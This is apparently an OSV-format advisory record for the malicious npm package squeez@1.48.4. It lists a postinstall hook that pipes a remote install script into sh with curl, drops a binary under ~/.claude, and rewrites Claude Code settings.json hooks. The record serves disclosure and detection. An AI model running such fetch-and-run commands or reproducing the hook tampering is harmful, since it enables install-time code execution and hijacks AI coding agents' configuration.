{
  "schema_version": "1.6.0",
  "id": "MAL-2026-13458",
  "modified": "2026-09-28T16:35:52.625Z",
  "published": "2026-09-28T16:35:52.625Z",
  "summary": "squeez — an npm package whose postinstall curl|sh-drops a remote script and native binary, then rewrites Claude Code hooks",
  "details": "squeez@1.48.4 runs a postinstall (node install.js) that executes curl -fsSL &lt;repo&gt;/install.sh | sh, downloads a platform-specific native binary from GitHub releases into ~/.claude/squeez/bin, and calls squeez setup --host=claude-code to register itself into Claude Code's settings.json hooks. Install-time remote code execution. Already tracked in ossf/malicious-packages as MAL-2026-13458.",
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "squeez"
      },
      "versions": [
        "1.48.4"
      ]
    }
  ],
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://research.codelake.dev/advisories/clr-2026-3059-squeez"
    },
    {
      "type": "WEB"
    },
    {
      "type": "ADVISORY",
      "url": "https://osv.dev/vulnerability/MAL-2026-13458"
    }
  ],
  "credits": [
    {
      "name": "Sascha Klein, codelake Research",
      "type": "FINDER",
      "contact": [
        "https://research.codelake.dev"
      ]
    }
  ],
  "database_specific": {
    "caseId": "CLR-2026-3059",
    "kind": "malware",
    "class": "Install-time supply-chain dropper · agent-config tamper",
    "severity": "Critical",
    "status": "Confirmed malicious",
    "iocs": {
      "ips": [],
      "hashes": [],
      "indicators": [
        "npm package: squeez@1.48.4",
        "Install hook: \"postinstall\": \"node install.js\"",
        "Remote stager: curl -fsSL &lt;github-repo&gt;/main/install.sh | sh",
        "Native binary from GitHub releases → ~/.claude/squeez/bin/squeez",
        "Agent tamper: squeez setup --host=claude-code writes Claude Code settings.json hooks",
        "OSV: MAL-2026-13458 (ossf/malicious-packages)"
      ]
    }
  }
}